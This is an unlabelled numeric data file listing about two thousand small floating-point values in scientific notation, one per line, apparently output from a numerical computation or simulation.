1.95152e-05
1.95151e-05
2.4891e-05
2.48814e-05
1.99648e-05
2.96156e-05
3.39055e-05
3.38401e-05
2.967e-05
2.94475e-05
3.37792e-05
2.96089e-05
2.96148e-05
3.39062e-05
3.38448e-05
2.96711e-05
2.96082e-05
3.37799e-05
2.94468e-05
2.93965e-05
3.39885e-05
3.39945e-05
2.91985e-05
3.38686e-05
2.91994e-05
2.46368e-05
2.00522e-05
2.44845e-05
2.05192e-05
2.46304e-05
2.4912e-05
2.03938e-05
2.46346e-05
2.00514e-05
2.44836e-05
2.05194e-05
2.49102e-05
2.46276e-05
2.03941e-05
2.8989e-05
2.53894e-05
4.64784e-06
7.58671e-06
9.68133e-06
1.50959e-05
1.50884e-05
1.46914e-05
8.30909e-06
8.31058e-06
5.42772e-06
6.07973e-06
3.49126e-06
8.74415e-07
7.03071e-06
3.76125e-06
4.44777e-06
5.42622e-06
6.08256e-06
3.49434e-06
8.75255e-07
3.76145e-06
7.0258e-06
4.45482e-06
1.10283e-05
1.46766e-05
1.5597e-05
1.08245e-05
1.18159e-05
1.49627e-05
9.74068e-06
1.10296e-05
1.46664e-05
1.55944e-05
1.08174e-05
1.49591e-05
9.73653e-06
1.18165e-05
3.71464e-06
-4.9686e-06
-4.96427e-06
3.5258e-06
3.51686e-06
7.84957e-07
4.66138e-06
7.55895e-06
2.49115e-05
2.49416e-05
2.10541e-05
2.06105e-05
2.44658e-05
2.47363e-05
2.02108e-05
2.90838e-05
3.38396e-05
2.95888e-05
2.97234e-05
3.43598e-05
2.9552e-05
2.96967e-05
3.36418e-05
3.38636e-05
3.00384e-05
3.39555e-05
2.97096e-05
2.55895e-05
2.0636e-05
2.47043e-05
2.46154e-05
1.94036e-05
2.49109e-05
2.49407e-05
2.10463e-05
2.0609e-05
2.44633e-05
2.47345e-05
2.02038e-05
2.90842e-05
3.38402e-05
2.95822e-05
3.4361e-05
2.97234e-05
2.95517e-05
2.96971e-05
3.36416e-05
3.38609e-05
3.39567e-05
3.00391e-05
2.97074e-05
2.55912e-05
2.06285e-05
2.47007e-05
2.46137e-05
1.93958e-05
9.89905e-06
1.48225e-05
1.52864e-05
1.17046e-05
1.52983e-05
1.19157e-05
1.15625e-05
4.19979e-06
3.15835e-06
1.77462e-06
2.43312e-06
-1.10347e-05
7.77457e-06
1.45006e-05
9.68625e-06
1.63576e-05
1.06086e-05
5.01842e-06
7.59748e-06
5.13181e-06
4.71983e-06
5.11245e-06
6.20398e-06
2.5695e-06
9.89321e-06
1.48171e-05
1.5286e-05
1.17011e-05
1.52882e-05
1.19202e-05
1.15593e-05
4.20346e-06
3.15344e-06
1.7726e-06
2.43647e-06
-1.10481e-05
7.76002e-06
1.44826e-05
9.68861e-06
1.63244e-05
1.05971e-05
5.01071e-06
7.59387e-06
5.12962e-06
4.71519e-06
5.1115e-06
6.19041e-06
2.58045e-06
2.89839e-05
2.53926e-05
2.89812e-05
2.53799e-05
9.68268e-06
1.50935e-05
1.50772e-05
1.46876e-05
8.31067e-06
8.31797e-06
5.42417e-06
6.08216e-06
3.48862e-06
8.75865e-07
4.46426e-06
7.02414e-06
3.77641e-06
5.41923e-06
6.08039e-06
3.48257e-06
8.57875e-07
4.46079e-06
7.0211e-06
3.77162e-06
1.10262e-05
1.46744e-05
1.55935e-05
1.08206e-05
1.49597e-05
1.18138e-05
9.73621e-06
1.10273e-05
1.46651e-05
1.55927e-05
1.08202e-05
1.49573e-05
1.18142e-05
9.7417e-06
3.72227e-06
-4.94829e-06
-4.95168e-06
8.03069e-07
3.54482e-06
3.53929e-06
4.65631e-06
7.55907e-06
4.64555e-06
7.56366e-06
1.1815e-05
-1.03803e-06
1.18104e-05
-1.03654e-06
3.15128e-06
1.17086e-05
1.16709e-05
1.31592e-05
1.31547e-05
-9.8408e-08
6.73267e-06
2.9881e-06
2.18883e-06
6.51788e-06
2.19009e-06
1.648e-05
6.75731e-06
6.73178e-06
2.98337e-06
2.1913e-06
6.51809e-06
2.18781e-06
1.64913e-05
6.76081e-06
3.48801e-06
3.80697e-06
5.07808e-08
4.817e-08
3.89558e-06
4.49221e-06
4.49307e-06
6.77442e-06
2.51951e-06
2.52686e-06
1.84678e-06
3.65279e-05
3.65001e-05
7.52042e-06
9.45981e-06
7.71348e-06
-4.91027e-06
2.09091e-05
1.72824e-06
6.39316e-06
7.52499e-06
9.4801e-06
7.71428e-06
-4.9111e-06
2.08973e-05
1.73757e-06
6.39435e-06
2.51305e-06
2.53415e-06
-6.48484e-06
7.19093e-07
7.16982e-07
1.1093e-05
1.14392e-05
-7.2904e-06
1.6103e-07
1.14677e-05
-7.29343e-06
1.61154e-07
7.80549e-06
3.55767e-06
8.64818e-06
2.27362e-06
3.68243e-05
9.31117e-06
-1.97487e-07
2.62509e-05
-1.43974e-06
1.48613e-05
1.6841e-05
3.15513e-06
1.74516e-06
1.9252e-07
1.01019e-05
1.17311e-05
5.06331e-06
4.91689e-07
3.77932e-06
7.18985e-06
5.38925e-06
4.1491e-06
4.90993e-06
1.97118e-06
6.36647e-06
4.65271e-06
1.31921e-06
5.7146e-06
4.14271e-06
2.96984e-06
5.46083e-07
2.19819e-06
7.28055e-06
3.19382e-06
4.87064e-06
5.96976e-06
1.13159e-05
3.45155e-06
7.41573e-06
5.14568e-06
1.66997e-07
8.09447e-06
5.33211e-06
3.27616e-06
1.93055e-06
3.95568e-06
7.32213e-06
6.53891e-06
5.39358e-06
4.15013e-06
4.91757e-06
1.97125e-06
6.37003e-06
4.66017e-06
1.31859e-06
5.71588e-06
4.15238e-06
2.97249e-06
5.43777e-07
3.19338e-06
7.2862e-06
2.20165e-06
4.87113e-06
5.97829e-06
1.13168e-05
3.4584e-06
7.40514e-06
1.67718e-07
5.1478e-06
8.09322e-06
5.33425e-06
3.27663e-06
1.93161e-06
7.32254e-06
6.53732e-06
3.95702e-06
9.48336e-06
6.20853e-07
1.58454e-07
1.51869e-06
-2.76027e-07
1.39225e-06
2.92433e-06
-3.52445e-06
8.38078e-07
1.89631e-06
3.0115e-07
2.72306e-06
9.48953e-06
6.13206e-07
1.54321e-07
1.5165e-06
-2.75485e-07
1.39083e-06
2.93548e-06
-3.53132e-06
8.29672e-07
1.89813e-06
3.02224e-07
2.72233e-06
3.16466e-06
1.16717e-05
1.16287e-05
1.31742e-05
1.30446e-05
-1.01515e-07
6.73356e-06
3.00152e-06
2.20603e-06
6.51645e-06
1.64799e-05
2.19977e-06
6.75795e-06
6.73366e-06
2.9821e-06
2.2103e-06
6.50801e-06
6.75493e-06
2.1796e-06
1.64839e-05
3.49571e-06
3.81129e-06
5.06635e-08
5.34858e-08
4.49534e-06
4.49171e-06
3.9181e-06
6.7631e-06
2.55318e-06
2.55266e-06
3.63952e-05
1.8506e-06
3.64813e-05
7.5322e-06
9.48042e-06
7.71695e-06
-4.90701e-06
2.0908e-05
6.39207e-06
1.73102e-06
7.53721e-06
9.49636e-06
7.7174e-06
-4.89502e-06
6.40855e-06
2.08364e-05
1.73098e-06
1.18197e-05
-1.03811e-06
2.55919e-06
2.52345e-06
-6.47383e-06
7.12729e-07
7.15779e-07
1.10646e-05
1.14753e-05
-7.29952e-06
1.60142e-07
1.14506e-05
-7.28083e-06
1.54699e-07
5.39474e-06
4.15466e-06
4.92025e-06
1.97933e-06
6.37752e-06
4.66113e-06
1.32096e-06
5.71506e-06
4.14345e-06
2.97048e-06
5.458e-07
2.19827e-06
7.28339e-06
3.19326e-06
4.8743e-06
5.97465e-06
1.13271e-05
3.4574e-06
7.42002e-06
5.15195e-06
1.67734e-07
8.09407e-06
5.32993e-06
3.27189e-06
1.92803e-06
3.95423e-06
7.32225e-06
6.53761e-06
7.83825e-06
3.56998e-06
8.70115e-06
2.26752e-06
3.68845e-05
9.32918e-06
-2.23735e-07
2.62675e-05
-1.47278e-06
1.48853e-05
1.69031e-05
3.16167e-06
1.73235e-06
1.85354e-07
1.0094e-05
1.17188e-05
5.08711e-06
4.85776e-07
3.777e-06
7.199e-06
5.39617e-06
4.15572e-06
1.98408e-06
4.9183e-06
4.66644e-06
6.37558e-06
1.32563e-06
5.71387e-06
4.14862e-06
5.47157e-07
2.97041e-06
3.19344e-06
2.19699e-06
7.28265e-06
8.09398e-06
5.32828e-06
3.26997e-06
1.92894e-06
7.321e-06
6.53853e-06
3.95181e-06
4.8714e-06
5.97452e-06
1.12975e-05
3.45523e-06
7.40953e-06
1.70496e-07
5.148e-06
9.48591e-06
6.17248e-07
1.55755e-07
1.51748e-06
-2.76477e-07
1.39069e-06
2.93413e-06
-3.52896e-06
8.29521e-07
1.89521e-06
2.99921e-07
2.72184e-06
6.15144e-07
9.48329e-06
1.57837e-07
-2.7403e-07
1.5146e-06
1.39063e-06
1.89651e-06
3.03044e-07
2.72288e-06
2.93122e-06
-3.50963e-06
8.32904e-07
4.28928e-06
3.97365e-06
2.5993e-06
2.59954e-06
4.10423e-06
4.10332e-06
2.94542e-06
3.61801e-06
7.48552e-06
3.51921e-06
3.52216e-06
5.2432e-06
5.24086e-06
1.20556e-06
3.97739e-06
1.95812e-06
4.32306e-06
4.05632e-06
3.67261e-06
4.89954e-06
2.39064e-06
3.97198e-06
1.95193e-06
4.32131e-06
4.05389e-06
4.89751e-06
3.6669e-06
2.38353e-06
4.2864e-06
3.97492e-06
2.59802e-06
2.59899e-06
4.1029e-06
4.10292e-06
2.94222e-06
3.61535e-06
7.48742e-06
3.51723e-06
3.51993e-06
5.2419e-06
5.23972e-06
1.20068e-06
3.97508e-06
1.95648e-06
4.3208e-06
4.05297e-06
3.67063e-06
4.89791e-06
2.38819e-06
3.97112e-06
1.95315e-06
4.32195e-06
4.05267e-06
4.898e-06
3.66807e-06
2.38258e-06
4.28679e-06
3.97402e-06
2.5999e-06
2.59789e-06
4.10339e-06
4.10215e-06
2.94395e-06
3.61243e-06
7.48084e-06
3.51936e-06
3.51854e-06
1.19989e-06
5.23713e-06
5.23725e-06
3.97123e-06
1.95207e-06
4.32139e-06
4.05553e-06
3.66632e-06
2.38361e-06
4.8975e-06
3.97276e-06
1.95332e-06
4.32405e-06
4.05673e-06
3.66856e-06
2.38557e-06
4.89981e-06
8.55093e-07
8.54041e-07
1.09229e-06
1.06787e-06
1.06689e-06
-1.38817e-07
3.99955e-07
1.685e-06
6.83818e-07
3.99252e-07
1.68554e-06
6.84743e-07
8.53866e-07
8.55383e-07
1.09276e-06
1.06958e-06
1.07236e-06
-1.35825e-07
3.99611e-07
1.6851e-06
6.85122e-07
3.97041e-07
1.68533e-06
6.81538e-07
8.53342e-07
8.54746e-07
1.09105e-06
1.0687e-06
1.06974e-06
-1.38545e-07
3.98997e-07
1.6827e-06
6.83625e-07
3.9786e-07
1.68318e-06
6.8131e-07
8.54906e-07
8.53367e-07
1.09225e-06
1.07247e-06
1.07117e-06
-1.38086e-07
3.97735e-07
1.6845e-06
6.81095e-07
3.96917e-07
1.684e-06
6.82156e-07
7.73465e-06
3.57418e-06
2.27437e-06
8.6983e-06
9.33521e-06
3.68785e-05
-2.24152e-07
2.6259e-05
1.48667e-05
-1.44549e-06
1.68936e-05
3.15613e-06
1.85773e-07
1.7178e-06
5.07489e-06
1.17434e-05
1.00801e-05
4.96132e-07
3.77258e-06
7.20754e-06
5.38903e-06
4.14834e-06
1.97482e-06
4.91239e-06
4.65733e-06
6.37145e-06
1.3205e-06
5.70787e-06
4.13668e-06
5.44544e-07
2.96303e-06
7.26667e-06
2.19231e-06
3.19141e-06
8.08442e-06
5.32971e-06
3.26425e-06
1.91843e-06
7.31349e-06
3.94002e-06
6.5318e-06
4.86822e-06
5.964e-06
1.13233e-05
3.44283e-06
5.14169e-06
7.41629e-06
1.64347e-07
7.78092e-06
3.57472e-06
8.75941e-06
2.2645e-06
3.68728e-05
9.32235e-06
-2.27333e-07
2.62468e-05
-1.45272e-06
1.48592e-05
1.68542e-05
3.14957e-06
1.72458e-06
1.82501e-07
1.17229e-05
1.00818e-05
5.07576e-06
4.83889e-07
3.77695e-06
7.19463e-06
9.4785e-06
6.11223e-07
1.54473e-07
1.51439e-06
-2.75701e-07
1.38413e-06
2.92428e-06
-3.51139e-06
8.39053e-07
1.91238e-06
2.99681e-07
2.72326e-06
6.12908e-07
9.47868e-06
1.5594e-07
-2.74713e-07
1.51943e-06
1.39182e-06
1.89897e-06
2.99307e-07
2.72127e-06
2.92935e-06
-3.52079e-06
8.30214e-07
3.16732e-06
1.17531e-05
1.17e-05
1.31604e-05
1.31771e-05
-1.08883e-07
6.72929e-06
2.98408e-06
2.16948e-06
6.50767e-06
1.64593e-05
2.18023e-06
6.75788e-06
6.72823e-06
2.9772e-06
2.18622e-06
6.50544e-06
6.75422e-06
2.17711e-06
1.64644e-05
3.49036e-06
3.81099e-06
5.75033e-08
5.34341e-08
4.49247e-06
4.48946e-06
3.91487e-06
6.76316e-06
2.49726e-06
2.49357e-06
3.65183e-05
1.82735e-06
3.65047e-05
7.53126e-06
9.48324e-06
7.72433e-06
-4.88576e-06
2.09058e-05
6.40358e-06
1.73948e-06
7.52953e-06
9.4827e-06
7.72168e-06
-4.90695e-06
6.39922e-06
2.09079e-05
1.71547e-06
1.18252e-05
-1.03192e-06
2.5682e-06
2.56077e-06
-6.47172e-06
7.21031e-07
7.10529e-07
1.1076e-05
1.1489e-05
-7.28298e-06
1.59832e-07
1.14855e-05
-7.2964e-06
1.60459e-07
5.39337e-06
4.15429e-06
1.97724e-06
4.91684e-06
4.66012e-06
6.37918e-06
1.32283e-06
5.71049e-06
4.13948e-06
5.42654e-07
2.96773e-06
7.2778e-06
2.19171e-06
3.19212e-06
8.08343e-06
5.33027e-06
3.26509e-06
1.9223e-06
7.31276e-06
3.94316e-06
6.53208e-06
4.87382e-06
5.96846e-06
1.13211e-05
3.45341e-06
5.15044e-06
7.42366e-06
1.67619e-07
7.84943e-06
3.58358e-06
2.26959e-06
8.67891e-06
9.3268e-06
3.68842e-05
-2.27508e-07
2.62557e-05
1.48657e-05
-1.4309e-06
1.68277e-05
3.15347e-06
1.76967e-07
1.72068e-06
5.08123e-06
1.17354e-05
1.00937e-05
4.95953e-07
3.78125e-06
7.20565e-06
7.80464e-06
3.58095e-06
2.27221e-06
8.71524e-06
9.33219e-06
3.68729e-05
-2.37389e-07
2.62578e-05
-1.46417e-06
1.48691e-05
1.69018e-05
3.1581e-06
1.7457e-07
1.70994e-06
1.17287e-05
5.07647e-06
1.00963e-05
4.89377e-07
3.77423e-06
7.20688e-06
6.19422e-07
9.47692e-06
1.54808e-07
-2.7499e-07
1.5161e-06
1.3839e-06
1.91431e-06
3.02178e-07
2.72408e-06
2.92154e-06
-3.52255e-06
8.4109e-07
6.1473e-07
9.48301e-06
1.56172e-07
-2.73998e-07
1.51691e-06
1.39139e-06
1.90125e-06
3.01971e-07
2.72233e-06
2.93035e-06
-3.52916e-06
8.29884e-07
1.18077e-05
-1.03574e-06
1.1812e-05
-1.03654e-06
2.48878e-06
2.54156e-06
-6.48361e-06
7.07033e-07
7.08714e-07
1.1059e-05
1.14292e-05
-7.30235e-06
1.55821e-07
1.14464e-05
-7.29659e-06
1.43211e-07
-5.30388e-07
-6.69126e-07
1.19372e-06
5.25232e-06
-4.85747e-06
1.81612e-05
-1.48575e-06
3.10647e-07
-1.16621e-05
4.39865e-06
1.32151e-05
2.91312e-06
-5.20121e-07
-6.66316e-07
1.20005e-06
5.26013e-06
-4.8595e-06
1.8186e-05
-1.47623e-06
3.24683e-07
-1.16712e-05
4.4003e-06
1.31699e-05
2.91041e-06
3.25329e-07
-1.16868e-05
4.42928e-06
1.31468e-05
2.89808e-06
3.06228e-07
-1.16734e-05
4.44628e-06
1.31821e-05
2.91197e-06
9.70088e-08
3.77811e-06
-3.45946e-06
1.16912e-06
1.87555e-06
-1.01147e-06
-1.53658e-06
9.99434e-08
3.77755e-06
-3.46316e-06
1.16529e-06
1.8767e-06
-1.01205e-06
-1.53701e-06
-5.02378e-07
-6.75373e-07
1.20464e-06
5.22796e-06
-4.85576e-06
1.82167e-05
-1.47635e-06
3.24935e-07
-1.16691e-05
4.40376e-06
2.9294e-06
1.31612e-05
9.90576e-08
3.77468e-06
-3.46361e-06
1.16883e-06
1.87529e-06
-1.53763e-06
-1.01085e-06
9.79767e-08
3.78738e-06
-3.45858e-06
1.16656e-06
1.87779e-06
-1.00561e-06
-1.54132e-06
-4.23903e-07
-6.72679e-07
1.20062e-06
5.27568e-06
-4.822e-06
1.81247e-05
-1.45729e-06
-4.90058e-07
-6.63965e-07
1.20451e-06
5.25708e-06
-4.89398e-06
-1.47785e-06
1.81682e-05
-5.11424e-07
-6.76889e-07
1.18857e-06
5.26577e-06
-4.91286e-06
-1.49362e-06
1.81305e-05
3.31856e-07
-1.16689e-05
4.43289e-06
2.93737e-06
1.3169e-05
9.93337e-08
3.78681e-06
-3.46195e-06
1.16435e-06
1.87729e-06
-1.54331e-06
-1.00567e-06
9.80838e-08
3.78379e-06
-3.45573e-06
1.16741e-06
1.87785e-06
-1.00486e-06
-1.53566e-06
-5.12035e-07
-6.6882e-07
1.20337e-06
5.29659e-06
-4.89069e-06
-1.48263e-06
1.81405e-05
-5.03577e-07
-6.70754e-07
1.19646e-06
5.2453e-06
-4.89334e-06
-1.48409e-06
1.81586e-05
2.94129e-07
-1.16864e-05
4.42343e-06
2.88729e-06
1.31326e-05
3.20634e-07
-1.16798e-05
4.39683e-06
2.89632e-06
1.31633e-05
9.52678e-08
3.7631e-06
-3.46775e-06
1.16151e-06
1.87088e-06
-1.01874e-06
-1.54519e-06
9.43794e-08
3.78256e-06
-3.46397e-06
1.16657e-06
1.87985e-06
-1.0124e-06
-1.54633e-06
1.93851e-06
-2.25777e-06
-4.0459e-06
1.93657e-06
-2.25222e-06
-4.04579e-06
-2.25231e-06
2.00746e-06
-4.04414e-06
1.95255e-06
-2.25916e-06
-4.0521e-06
-2.25683e-06
1.94735e-06
-4.04456e-06
1.98451e-06
-2.25898e-06
-4.04805e-06
-2.25931e-06
1.97637e-06
-4.04587e-06
-2.25626e-06
1.98936e-06
-4.04709e-06
5.97864e-07
-4.31429e-06
1.70387e-05
5.06925e-06
-9.50831e-07
2.82792e-05
2.20168e-06
-3.35826e-06
3.49064e-06
-1.062e-06
-1.12181e-06
2.80896e-05
3.85545e-06
1.95082e-05
7.87042e-06
-6.19984e-06
1.53207e-05
2.79375e-05
-4.95615e-06
-1.284e-05
-5.75599e-06
6.26036e-07
-4.3133e-06
1.70628e-05
5.19896e-06
-9.18535e-07
2.83471e-05
2.20836e-06
-3.34691e-06
-1.05526e-06
3.54524e-06
-1.10003e-06
3.88809e-06
2.81279e-05
1.95285e-05
7.96448e-06
-6.25117e-06
1.53375e-05
2.79791e-05
-4.95886e-06
-1.28921e-05
-5.74563e-06
-4.42054e-07
4.68978e-06
8.07264e-06
1.35089e-06
4.37904e-06
5.43723e-06
-3.14258e-07
-4.42059e-07
4.70288e-06
8.06615e-06
1.35436e-06
4.37836e-06
5.4269e-06
-3.07205e-07
-4.29895e-07
4.70238e-06
8.09522e-06
1.35608e-06
5.44629e-06
4.38698e-06
-3.03864e-07
-4.35738e-07
4.7127e-06
8.10289e-06
1.34793e-06
5.44221e-06
4.39837e-06
-3.11758e-07
-9.66236e-06
-1.18498e-05
-7.02538e-06
1.43361e-07
-3.01664e-06
-9.61396e-06
-1.18472e-05
-7.03183e-06
1.02451e-07
-3.02114e-06
-4.55192e-06
-3.21829e-06
-2.29193e-06
-1.11678e-05
-3.03282e-06
-4.9858e-06
-3.61704e-07
-4.55412e-06
-3.21734e-06
-2.30494e-06
-1.11761e-05
-3.0369e-06
-4.99039e-06
-3.66683e-07
6.12986e-07
-4.31868e-06
1.70585e-05
5.11749e-06
-9.17114e-07
2.20657e-06
2.83277e-05
-3.36504e-06
3.53495e-06
-1.04327e-06
-1.08121e-06
2.81246e-05
3.87623e-06
1.95393e-05
7.88216e-06
-6.21605e-06
1.53663e-05
2.79584e-05
-4.9443e-06
-1.28575e-05
-5.73975e-06
-4.32489e-07
4.70474e-06
8.10029e-06
1.35278e-06
5.41986e-06
4.39873e-06
-3.09405e-07
-4.3247e-07
4.71516e-06
8.0915e-06
1.37245e-06
4.39841e-06
5.44052e-06
-2.97484e-07
-9.64911e-06
-1.1843e-05
-7.02875e-06
1.51952e-07
-3.01451e-06
-9.6055e-06
-1.18185e-05
-7.01976e-06
1.4789e-07
-2.98952e-06
-4.55455e-06
-3.21992e-06
-2.29621e-06
-1.11753e-05
-3.0402e-06
-4.99259e-06
-3.61886e-07
-4.55016e-06
-3.20428e-06
-2.27567e-06
-1.11625e-05
-3.02756e-06
-4.97364e-06
-3.88954e-07
5.94067e-07
-4.30918e-06
1.70631e-05
5.09672e-06
-9.47798e-07
2.20353e-06
2.83134e-05
-3.35239e-06
3.52109e-06
-1.07153e-06
-1.12021e-06
2.8115e-05
3.863e-06
1.94818e-05
7.85763e-06
-6.19709e-06
1.52982e-05
2.7953e-05
-4.97501e-06
-1.28547e-05
-5.74403e-06
5.98701e-07
-4.31681e-06
1.70205e-05
5.17627e-06
-9.28877e-07
2.8316e-05
2.20712e-06
-3.35955e-06
-1.06149e-06
3.57859e-06
-1.10824e-06
3.88066e-06
2.81108e-05
1.95048e-05
7.92559e-06
-6.20608e-06
1.5311e-05
2.79239e-05
-4.96807e-06
-1.28578e-05
-5.74928e-06
6.03108e-07
-4.30035e-06
1.70296e-05
5.10774e-06
-9.57197e-07
2.20548e-06
2.82975e-05
-3.35003e-06
3.52508e-06
-1.06699e-06
-1.12441e-06
2.81363e-05
3.85034e-06
1.94853e-05
8.00708e-06
-6.22248e-06
1.52458e-05
2.79006e-05
-4.96819e-06
-1.28609e-05
-5.76948e-06
-4.2215e-07
4.71774e-06
8.0866e-06
1.36612e-06
5.44038e-06
4.40951e-06
-2.95867e-07
-4.22646e-07
4.70503e-06
8.11759e-06
1.3621e-06
4.40994e-06
5.45769e-06
-3.03273e-07
-9.65814e-06
-1.18264e-05
-7.02821e-06
2.01405e-07
-3.01419e-06
-9.60979e-06
-1.18305e-05
-7.02329e-06
1.37203e-07
-3.00785e-06
-4.55452e-06
-3.19753e-06
-2.28398e-06
-1.11696e-05
-3.02973e-06
-4.97705e-06
-3.58322e-07
-4.54588e-06
-3.20185e-06
-2.29036e-06
-1.11667e-05
-3.03234e-06
-4.98299e-06
-3.53816e-07
6.13538e-07
-4.31042e-06
1.70613e-05
5.10448e-06
-9.41463e-07
2.83043e-05
2.21419e-06
-3.35001e-06
-1.06117e-06
3.49978e-06
-1.11786e-06
3.85614e-06
2.80837e-05
1.94917e-05
7.97676e-06
-6.20251e-06
1.52594e-05
2.79312e-05
-4.96312e-06
-1.28351e-05
-5.76163e-06
6.13915e-07
-4.31112e-06
1.70632e-05
5.21864e-06
-9.21195e-07
2.21784e-06
2.83193e-05
-3.35805e-06
-1.05883e-06
3.61491e-06
-1.10039e-06
3.86134e-06
2.81076e-05
1.95037e-05
7.87855e-06
-6.20896e-06
1.53306e-05
2.79452e-05
-4.96749e-06
-1.28541e-05
-5.75811e-06
-9.65339e-06
-1.18608e-05
-7.02634e-06
9.27349e-08
-3.01324e-06
-9.61214e-06
-1.18437e-05
-7.03564e-06
1.27138e-07
-3.01972e-06
-4.54996e-06
-3.24324e-06
-2.30663e-06
-1.11724e-05
-3.04215e-06
-5.0016e-06
-3.56524e-07
-4.55159e-06
-3.22095e-06
-2.29791e-06
-1.11791e-05
-3.03091e-06
-4.98654e-06
-3.62339e-07
-2.73597e-06
-1.22616e-06
-1.9997e-06
-3.72985e-06
-7.72471e-06
-2.72443e-06
-1.26942e-06
-2.00182e-06
-3.72461e-06
-7.72077e-06
-1.66589e-06
-1.18275e-06
-1.95869e-07
-3.17414e-06
-3.77437e-06
-2.77621e-06
-1.22892e-05
-1.66549e-06
-1.20205e-06
-1.92688e-07
-3.1496e-06
-3.76909e-06
-2.77352e-06
-1.22646e-05
-2.73259e-06
-1.21605e-06
-2.00009e-06
-3.72771e-06
-7.71675e-06
-2.72573e-06
-1.20766e-06
-2.00258e-06
-3.72641e-06
-7.72824e-06
-1.66504e-06
-1.22533e-06
-1.95056e-07
-3.1838e-06
-3.76905e-06
-2.77504e-06
-1.22786e-05
-1.68255e-06
-1.16021e-06
-1.93413e-07
-3.10914e-06
-3.77213e-06
-2.8e-06
-1.22903e-05
-1.65368e-06
-1.17684e-06
-1.93707e-07
-3.17193e-06
-3.77526e-06
-2.79119e-06
-1.22859e-05
-1.66331e-06
-1.21911e-06
-1.94347e-07
-3.19323e-06
-3.77464e-06
-2.79318e-06
-1.22786e-05
-2.71928e-06
-1.21589e-06
-2.00057e-06
-3.72919e-06
-7.73365e-06
-2.71141e-06
-1.19567e-06
-2.00072e-06
-3.72664e-06
-7.71581e-06
-1.66005e-06
-1.23795e-06
-1.93152e-07
-3.18094e-06
-3.77562e-06
-2.7927e-06
-1.23015e-05
-1.65469e-06
-1.17815e-06
-1.92664e-07
-3.17639e-06
-3.77021e-06
-2.78683e-06
-1.22782e-05
-2.75686e-06
-1.23259e-06
-2.0046e-06
-3.7363e-06
-7.72185e-06
-2.73057e-06
-1.21436e-06
-1.99834e-06
-3.72079e-06
-7.72086e-06
9.09057e-06
1.128e-05
2.06115e-05
6.40108e-06
6.94052e-06
1.32636e-05
1.69747e-05
5.01848e-06
3.08947e-06
1.06633e-06
7.02354e-06
-1.44528e-06
1.40584e-05
9.10154e-06
1.12837e-05
2.06217e-05
6.36104e-06
6.94689e-06
1.32978e-05
1.69711e-05
5.08199e-06
3.11934e-06
1.06847e-06
7.03763e-06
-1.43084e-06
1.40821e-05
1.5985e-05
1.5037e-05
-1.00854e-05
3.86642e-06
4.36313e-06
1.59587e-05
1.49991e-05
-1.00663e-05
3.84281e-06
4.465e-06
-1.4218e-06
1.40668e-05
-1.45947e-06
1.40855e-05
1.59967e-05
1.50307e-05
-1.00791e-05
3.89192e-06
4.3919e-06
1.60924e-05
1.50107e-05
-1.00688e-05
3.86042e-06
4.40077e-06
-1.4681e-05
-5.1713e-07
-5.9696e-07
-6.09878e-07
-1.19596e-06
3.15476e-07
3.12354e-07
9.10476e-06
1.12661e-05
2.06309e-05
6.31442e-06
6.92645e-06
1.69647e-05
1.33065e-05
5.11077e-06
3.1244e-06
1.04665e-06
7.09917e-06
1.59964e-05
1.50143e-05
-1.00769e-05
3.8772e-06
4.40511e-06
1.60192e-05
1.50828e-05
-1.00756e-05
3.87906e-06
4.48508e-06
-1.42579e-06
1.41156e-05
-1.46691e-05
-4.84499e-07
-5.9118e-07
-6.04399e-07
-1.16926e-06
3.1782e-07
2.90203e-07
9.0766e-06
1.12773e-05
2.06299e-05
6.35861e-06
6.91955e-06
1.69766e-05
1.32653e-05
5.0547e-06
3.11392e-06
1.0302e-06
7.00495e-06
9.11796e-06
1.12743e-05
2.06296e-05
6.42041e-06
6.97619e-06
1.33013e-05
1.69675e-05
5.03472e-06
3.15253e-06
1.11202e-06
6.98476e-06
9.1021e-06
1.12971e-05
2.06324e-05
6.39285e-06
6.94657e-06
1.69881e-05
1.33042e-05
5.06366e-06
3.10764e-06
1.05101e-06
7.0336e-06
1.60324e-05
1.49705e-05
-1.00559e-05
3.85722e-06
4.48694e-06
1.60462e-05
1.50164e-05
-1.00537e-05
3.87496e-06
4.46029e-06
-1.41861e-06
1.41168e-05
-1.46763e-05
-4.7923e-07
-5.82071e-07
-6.09886e-07
-1.15663e-06
3.21309e-07
3.23741e-07
9.07501e-06
1.12809e-05
2.05969e-05
6.32203e-06
6.93408e-06
1.32335e-05
1.6963e-05
5.04597e-06
3.15618e-06
1.08544e-06
7.01628e-06
9.11362e-06
1.12879e-05
2.0608e-05
6.4213e-06
6.96144e-06
1.69633e-05
1.33075e-05
5.08731e-06
3.12698e-06
1.09632e-06
7.04601e-06
-1.46889e-06
1.40717e-05
-1.43815e-06
1.4071e-05
-1.46735e-05
-4.78727e-07
-6.05603e-07
-6.09894e-07
-1.19654e-06
3.22006e-07
3.16869e-07
6.51474e-06
2.46176e-06
2.56583e-06
7.91542e-06
6.52753e-06
2.46277e-06
2.57058e-06
7.95332e-06
6.46436e-06
2.51341e-06
2.65577e-06
7.87193e-06
6.49574e-06
2.44234e-06
2.61027e-06
7.92811e-06
6.51834e-06
2.45249e-06
2.57333e-06
7.90831e-06
6.50641e-06
2.50072e-06
2.62283e-06
7.92778e-06
6.49804e-06
2.49366e-06
2.61965e-06
7.94538e-06
6.4963e-06
2.50132e-06
2.64517e-06
7.92573e-06
-6.67259e-06
-8.47387e-06
-6.66678e-06
-8.47592e-06
-3.76916e-06
1.28392e-06
-2.41545e-06
-3.39675e-06
-5.73169e-06
-6.12838e-06
-3.41915e-06
-9.06628e-07
-4.25546e-06
-5.29021e-06
-2.20702e-06
-5.92104e-06
-2.52811e-06
2.44709e-07
-9.47017e-06
-9.65593e-06
-7.27374e-06
-6.9227e-06
-8.21417e-06
-8.50701e-06
-4.15648e-06
-3.76521e-06
1.32205e-06
-2.40473e-06
-3.39725e-06
-5.70519e-06
-3.41909e-06
-6.1231e-06
-8.70416e-07
-4.245e-06
-5.25046e-06
-2.21754e-06
-5.91608e-06
-2.52914e-06
1.38306e-07
-9.47056e-06
-9.6401e-06
-7.247e-06
-6.91532e-06
-8.23147e-06
-8.49197e-06
-4.1513e-06
-6.66606e-06
-8.47862e-06
-6.66528e-06
-8.46757e-06
-3.75717e-06
1.32507e-06
-2.40383e-06
-3.39819e-06
-5.70979e-06
-6.13252e-06
-3.41638e-06
-4.25587e-06
-9.19445e-07
-5.28389e-06
-2.21008e-06
-2.52831e-06
-5.92982e-06
1.2438e-07
-9.50508e-06
-9.65252e-06
-7.25683e-06
-6.92728e-06
-8.25868e-06
-8.50673e-06
-4.15366e-06
